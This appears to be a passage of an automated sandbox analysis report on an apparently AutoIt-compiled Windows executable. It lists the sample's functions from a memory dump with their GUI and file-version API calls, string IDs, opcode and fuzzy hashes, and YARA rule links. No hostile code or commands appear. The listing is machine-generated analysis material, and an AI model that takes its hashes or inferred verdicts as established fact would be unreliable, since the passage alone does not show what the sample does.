                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 003FAC2F
                                                                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003FAC46
                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 003FAC5B
                                                                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003FACA7
                                                                                                                                                                      • GetWindowTextW.USER32 ref: 003FACCE
                                                                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 003FACEC
                                                                                                                                                                      • DrawFocusRect.USER32 ref: 003FACF7
                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 003FAD05
                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 003FAD0D
                                                                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003FAD21
                                                                                                                                                                      • SelectObject.GDI32(?,003FA869), ref: 003FAD38
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 003FAD43
                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 003FAD49
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 003FAD4E
                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 003FAD54
                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 003FAD5E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1996641542-0
                                                                                                                                                                      • Opcode ID: 670d014d3f6d827d8166c59239849ef13b1cade42cc19c3a14bce97cf1287935
                                                                                                                                                                      • Instruction ID: b41bb498175b85836e3936d4f54bcc805cb370d603a5357eee77de9137c58417
                                                                                                                                                                      • Opcode Fuzzy Hash: 670d014d3f6d827d8166c59239849ef13b1cade42cc19c3a14bce97cf1287935
                                                                                                                                                                      • Instruction Fuzzy Hash: 1D613CB1900618EFDF129FA8DC48EBE7B79EF08320F118125FE15AB2A1D6759D40DB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F8C44, Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003F8D34
                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003F8D45
                                                                                                                                                                      • CharNextW.USER32(0000014E), ref: 003F8D74
                                                                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003F8DB5
                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003F8DCB
                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003F8DDC
                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003F8DF9
                                                                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 003F8E45
                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003F8E5B
                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 003F8E8C
                                                                                                                                                                      • _memset.LIBCMT ref: 003F8EB1
                                                                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003F8EFA
                                                                                                                                                                      • _memset.LIBCMT ref: 003F8F59
                                                                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003F8F83
                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 003F8FDB
                                                                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 003F9088
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 003F90AA
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003F90F4
                                                                                                                                                                      • SetMenuItemInfoW.USER32 ref: 003F9121
                                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 003F9130
                                                                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 003F9158
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 1073566785-4108050209
                                                                                                                                                                      • Opcode ID: 2341668887d2e2a14f7c5b9a0b4da7e578c98eeae2d03cb2e9579a591f8fb026
                                                                                                                                                                      • Instruction ID: 6c335ecacc10dc2366a58fb1a261ada7adbf305fab22794ec6fed034455276c2
                                                                                                                                                                      • Opcode Fuzzy Hash: 2341668887d2e2a14f7c5b9a0b4da7e578c98eeae2d03cb2e9579a591f8fb026
                                                                                                                                                                      • Instruction Fuzzy Hash: C7E1507090021DAFDF269F54CC88EFE7BB9EF05710F108166FA15AA290DB708A85DF61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F4B16, Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 003F4C51
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003F4C66
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003F4C6D
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 003F4CCF
                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 003F4CFB
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 003F4D24
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003F4D42
                                                                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003F4D68
                                                                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 003F4D7D
                                                                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003F4D90
                                                                                                                                                                      • IsWindowVisible.USER32 ref: 003F4DB0
                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003F4DCB
                                                                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003F4DDF
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003F4DF7
                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 003F4E1D
                                                                                                                                                                      • GetMonitorInfoW.USER32 ref: 003F4E37
                                                                                                                                                                      • CopyRect.USER32 ref: 003F4E4E
                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 003F4EB9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                                                                      • Opcode ID: 1e7a8b353dba76df4d973fc384eccb5ba1951008d5035ea9b4fb441b5c96d39e
                                                                                                                                                                      • Instruction ID: be196858c9d6c960fc21cf7e99ea97ff788aea2331390ed0073804f338e2a9a0
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e7a8b353dba76df4d973fc384eccb5ba1951008d5035ea9b4fb441b5c96d39e
                                                                                                                                                                      • Instruction Fuzzy Hash: F2B15A71604341AFDB16DF64C944B6BBBE4BF88710F008A1DFA999B2A1DB75EC04CB91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D46D6, Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003D46E8
                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003D470E
                                                                                                                                                                      • _wcscpy.LIBCMT ref: 003D473C
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003D4747
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003D475D
                                                                                                                                                                      • _wcsstr.LIBCMT ref: 003D4768
                                                                                                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003D4784
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003D47CD
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003D47D4
                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 003D47FF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                      • API String ID: 699586101-1459072770
                                                                                                                                                                      • Opcode ID: 0b262d68d1ba0642deb46bf076c615f62eeb3ec122640f9fbf37ed04ca94598d
                                                                                                                                                                      • Instruction ID: 1c8b4369ef86e7d7e6003262b8457d8eb495e19254a32337301d884ec721c041
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b262d68d1ba0642deb46bf076c615f62eeb3ec122640f9fbf37ed04ca94598d
                                                                                                                                                                      • Instruction Fuzzy Hash: F7411672A00215BBDF13B764AC43EBF776CEF01750F100166FD05EA282EB359A1196A5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003727D9, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SystemParametersInfoW.USER32 ref: 003728BC
                                                                                                                                                                      • GetSystemMetrics.USER32 ref: 003728C4
                                                                                                                                                                      • SystemParametersInfoW.USER32 ref: 003728EF
                                                                                                                                                                      • GetSystemMetrics.USER32 ref: 003728F7
                                                                                                                                                                      • GetSystemMetrics.USER32 ref: 0037291C
                                                                                                                                                                      • SetRect.USER32 ref: 00372939
                                                                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00372949
                                                                                                                                                                      • CreateWindowExW.USER32 ref: 0037297C
                                                                                                                                                                      • SetWindowLongW.USER32 ref: 00372990
                                                                                                                                                                      • GetClientRect.USER32 ref: 003729AE
                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 003729CA
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 003729D5
                                                                                                                                                                        • Part of subcall function 00372344: GetCursorPos.USER32(?,?,004367B0,?,004367B0,004367B0,?,003FC247,00000000,00000001,?,?,?,003ABC4F,?,?), ref: 00372357
                                                                                                                                                                        • Part of subcall function 00372344: ScreenToClient.USER32 ref: 00372374
                                                                                                                                                                        • Part of subcall function 00372344: GetAsyncKeyState.USER32(00000001), ref: 00372399
                                                                                                                                                                        • Part of subcall function 00372344: GetAsyncKeyState.USER32(00000002), ref: 003723A7
                                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00371256), ref: 003729FC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                                                                      • Opcode ID: 450f7aa0c04d789afbc61f1db2afbeff7d6fbc546c0adfec7aa43ac4f1973219
                                                                                                                                                                      • Instruction ID: 7bb9e3b9615f4e03b5076558733a34785e808d62c88d86ad8c1a2e4452ed2cda
                                                                                                                                                                      • Opcode Fuzzy Hash: 450f7aa0c04d789afbc61f1db2afbeff7d6fbc546c0adfec7aa43ac4f1973219
                                                                                                                                                                      • Instruction Fuzzy Hash: 43B14F7560020AEFDB26DF68DC45BAE7BB8FF08314F118129FA19E7290DB789850CB54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F4069, Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 003F40F6
                                                                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003F41B6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                      • API String ID: 3974292440-719923060
                                                                                                                                                                      • Opcode ID: dd016ddd56aeaf9f270942493140165df71f6fd095678b71664fb4cd87157064
                                                                                                                                                                      • Instruction ID: 9574570d8c78042299aa786a908b15807ffe5e0988bf75d9e84040f7c0407dd5
                                                                                                                                                                      • Opcode Fuzzy Hash: dd016ddd56aeaf9f270942493140165df71f6fd095678b71664fb4cd87157064
                                                                                                                                                                      • Instruction Fuzzy Hash: 8FA18D302142159FCB16EF24C941B7AB3A9FF84314F11896EB99A9F792DB34EC45CB41
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E52F0, Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 003E5309
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 003E5314
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 003E531F
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 003E532A
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 003E5335
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 003E5340
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 003E534B
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 003E5356
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 003E5361
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 003E536C
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 003E5377
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 003E5382
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 003E538D
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 003E5398
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 003E53A3
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 003E53AE
                                                                                                                                                                      • GetCursorInfo.USER32(?), ref: 003E53BE
                                                                                                                                                                      • GetLastError.KERNEL32(00000001,00000000), ref: 003E53E9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215588206-0
                                                                                                                                                                      • Opcode ID: c9c051254b422b3293f3e4d7b0bc4b12556dae52f04066311b24ca21316cb23f
                                                                                                                                                                      • Instruction ID: 281de93428b46bdb63a801e05c912c5ef7de6f49208a3554ed390c253f367a34
                                                                                                                                                                      • Opcode Fuzzy Hash: c9c051254b422b3293f3e4d7b0bc4b12556dae52f04066311b24ca21316cb23f
                                                                                                                                                                      • Instruction Fuzzy Hash: E1415370E043296ADB119FBB8C49D6EFFB8EF51B50B10452FA509E72D1DAB89401CE61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CAA64, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                                                      • String ID: %s%u
                                                                                                                                                                      • API String ID: 3744389584-679674701
                                                                                                                                                                      • Opcode ID: 556b833ecbccab07c2ab4c8949e34c67e4d8c460168fc96973afa60c3756c67c
                                                                                                                                                                      • Instruction ID: 719f74cd91958dc1ab22f55e21737cdc001306cf25043c237b28ea5407435ecc
                                                                                                                                                                      • Opcode Fuzzy Hash: 556b833ecbccab07c2ab4c8949e34c67e4d8c460168fc96973afa60c3756c67c
                                                                                                                                                                      • Instruction Fuzzy Hash: 88A1C171604A0AAFD716DF64C898FAAB7A8FF04319F00852DF99AC6150DB30ED45CB92
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CB397, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                                                                      • Opcode ID: c2959c1b4a86705d88858e652b35d901049d5ad28abb35676e5b54c00cdaf1e3
                                                                                                                                                                      • Instruction ID: 8b725755f78c95065bbba9fc1e7cc98bd76e4e634cdbe6a33dceb42f7465ed1b
                                                                                                                                                                      • Opcode Fuzzy Hash: c2959c1b4a86705d88858e652b35d901049d5ad28abb35676e5b54c00cdaf1e3
                                                                                                                                                                      • Instruction Fuzzy Hash: 66816B720082459FDB16DF11C886FAABBE8EF44314F14856DFD89DA0A2DB34DD49CBA1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FC8EE, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00372612: GetWindowLongW.USER32(?,000000EB), ref: 00372623
                                                                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 003FC917
                                                                                                                                                                        • Part of subcall function 003FADF1: ClientToScreen.USER32(?,?), ref: 003FAE1A
                                                                                                                                                                        • Part of subcall function 003FADF1: GetWindowRect.USER32 ref: 003FAE90
                                                                                                                                                                        • Part of subcall function 003FADF1: PtInRect.USER32(?,?,003FC304), ref: 003FAEA0
                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003FC980
                                                                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003FC98B
                                                                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003FC9AE
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003FC9DE
                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003FC9F5
                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003FCA0E
                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 003FCA25
                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 003FCA47
                                                                                                                                                                      • DragFinish.SHELL32(?), ref: 003FCA4E
                                                                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003FCB41
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prC
                                                                                                                                                                      • API String ID: 169749273-1010585698
                                                                                                                                                                      • Opcode ID: 6e0096ce6ac18e8f2efee5b110d55fa0b4c2df285f909dd714760da79535960d
                                                                                                                                                                      • Instruction ID: 4400f03d6560d67fb73e79e7d2576427ddddb3c4829955a094b621a62033ab21
                                                                                                                                                                      • Opcode Fuzzy Hash: 6e0096ce6ac18e8f2efee5b110d55fa0b4c2df285f909dd714760da79535960d
                                                                                                                                                                      • Instruction Fuzzy Hash: 18619E71108305AFC712EF60DD85DAFBBF8EF88310F00492EF695961A1DB749A49CB56
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CB1E0, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                      • API String ID: 1038674560-1810252412
                                                                                                                                                                      • Opcode ID: e2bde44b585c34b0de68fff1e8133d3cc83837188e3a6acc01965458a4ce7980
                                                                                                                                                                      • Instruction ID: c87b2b2cf59ca744bd85de4abfebd7116e5038f74619235fa1d0917151176b80
                                                                                                                                                                      • Opcode Fuzzy Hash: e2bde44b585c34b0de68fff1e8133d3cc83837188e3a6acc01965458a4ce7980
                                                                                                                                                                      • Instruction Fuzzy Hash: FF31E430A44315A6DF27FA60DD43FEEB7A89F10750FB0442AF445B90E2EF696E04C655
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CC4C1, Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 003CC4D4
